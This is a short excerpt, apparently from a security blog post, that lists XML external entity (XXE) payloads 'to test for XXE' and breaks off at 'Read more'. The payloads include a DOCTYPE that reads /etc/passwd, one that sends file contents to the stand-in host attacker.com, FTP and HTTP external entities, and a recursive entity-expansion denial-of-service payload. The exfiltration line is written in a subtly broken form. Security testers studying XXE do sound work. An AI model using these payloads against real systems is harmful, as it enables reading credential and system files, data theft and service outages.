XXE

Here are some common XXE payloads that can be used to test for XXE- <!DOCTYPE replace [<!ENTITY example “Hello World”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “file:///etc/passwd”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “ftp://username:password@ftp.example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://attacker.com/?data=%file_contents;”>]> <!DOCTYPE replace [<!ENTITY example “Hello &example2;”><!ENTITY example2 “&example;&example;&example;”>]> These payloads are … Read more